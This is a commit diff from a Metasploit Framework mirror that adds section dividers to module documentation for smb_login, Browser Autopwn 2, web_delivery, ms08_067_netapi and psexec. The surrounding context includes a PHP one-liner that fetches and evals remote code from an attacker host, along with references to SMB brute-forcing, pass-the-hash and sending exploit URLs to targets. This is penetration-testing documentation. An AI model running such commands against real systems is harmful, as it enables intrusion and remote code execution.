infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add --- to make sections to stand out more

bug/bundler_fix
wchen-r7 2016-03-05 15:17:19 -06:00
parent b82b1b0a47
commit 03eb568af7
6 changed files with 47 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
data/markdown_doc/module_doc_template.md
View File

@ -4,10 +4,14 @@ But feel free to add more content/sections to this.
## Vulnerable Application
---
Instructions to get the vulnerable application.
## Verification Steps
---
Example steps in this format:
1. Install the application
@ -18,13 +22,17 @@ But feel free to add more content/sections to this.
## Options
---
**Option name**
Talk about what it does, and how to use it appropriately.
## Scenarios
Specific demo of using the module:
---
Specific demo of using the module that might be useful in a real world scenario.
```
code or console output

6
documentation/modules/auxiliary/scanner/smb/smb_login.md
View File

@ -4,10 +4,14 @@ and log into more machines.
## Vulnerable Application
---
To use smb_login, make sure you are able to connect to a SMB service that supports SMBv1.
## Verification Steps
---
The following demonstrates a basic scenario of using the [built-in wordlists](https://github.com/rapid7/metasploit-framework/tree/master/data/wordlists) to brute-force SMB:
```
@ -42,6 +46,8 @@ msf auxiliary(smb_login)
## Options
---
By default, the smb_login module only requires the RHOSTS option to run. But in reality, you will
also need to supply user names and passwords. The following options are available to support
different credential formats:

10
documentation/modules/auxiliary/server/browser_autopwn2.md
View File

@ -3,6 +3,8 @@ feel different for you. Here are the features you should know about before using
## Vulnerable Applications
---
Browser Autopwn 2 is capable of targeting popular browsers and 3rd party plugins, such as:
* Internet Explorer
@ -14,6 +16,8 @@ Browser Autopwn 2 is capable of targeting popular browsers and 3rd party plugins
## Exploit URLs
---
Normally, the only URL you need to care about is the **BrowserAutoPwn URL**. This is the URL
you should send to the targets you wish to attack.
@ -29,6 +33,8 @@ used, including the URLs.
## Browser Autopwn 2 Options
---
**The HTMLContent Option**
The HTMLContent option allows you to serve a basic HTML web page to the browser instead of having a
@ -137,6 +143,8 @@ set ExploitReloadTimeout 5000
## Scenarios
---
By default, Browser Autopwn 2 goes through the entire exploit module tree, and will try to use
different types of exploits - Firefox, Internet Explorer, Adobe Flash, Android, etc. If you want to
test a specific application, basically all you need to do is setting the
@ -158,6 +166,8 @@ $ ./msfconsole -q -r scripts/resource/bap_flash_only.rc
## Logging
---
In addition, when a browser connects to BAP, this link-clicking event is also logged to the
database as a "bap.clicks" note type. If the ShowExploitList option is set to true, that will also
save the exploit list information so that after testing you can go back to the database and see

6
documentation/modules/exploit/multi/script/web_delivery.md
View File

@ -11,6 +11,8 @@ say the target supports Powershell.
## Verification Steps
---
To be able to use web_delivery, you must gain access to the target machine first, with the ability
to execute either the Python, or PHP, or Powershell interpreter.
@ -44,6 +46,8 @@ php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.23.1:8080/
## Targets
---
**Python**
Python is a fairly popular language, especially on unix-based systems. For example, it comes with
@ -61,6 +65,8 @@ don't come with it by default, but it is still possible to see it installed on a
## Scenarios
---
**Against a compromised web application**
web_delivery would work nicely for a web application with a command execution vulnerability.

8
documentation/modules/exploit/windows/smb/ms08_067_netapi.md
View File

@ -9,6 +9,8 @@ vulnerable code path, not just passively.
## Vulnerable Application
---
This exploit works against a vulnerable SMB service from one of these Windows systems:
* Windows 2000
@ -20,14 +22,20 @@ the system's patch level, or use a vulnerability check.
## Verification Steps
---
Please see Basic Usage under Overview.
## Options
---
Please see Required Options under Overview.
## Scenarios
---
**Failure to detect the language pack**
On some Windows systems, ms08_067_netapi (as well as other SMB modules) might show you this

8
documentation/modules/exploit/windows/smb/psexec.md
View File

@ -9,6 +9,8 @@ you normally would with any Metasploit exploits.
## Vulnerable Application
---
To be able to use exploit/windows/smb/psexec, you must meet these requirements:
1. You have a valid username/password.
@ -18,6 +20,8 @@ To be able to use exploit/windows/smb/psexec, you must meet these requirements:
## Verification Steps
---
At the minimum, you should be able use psexec to get a session with a valid credential:
```
@ -46,6 +50,8 @@ meterpreter >
## Options
---
By default, exploit/windows/smb/psexec can be as simple as setting the RHOST option, and ready to
go. But in reality, you will probably need to at least configure:
@ -59,6 +65,8 @@ This can be either the plain text version, or the Windows hash.
## Scenarios
---
**Pass the Hash**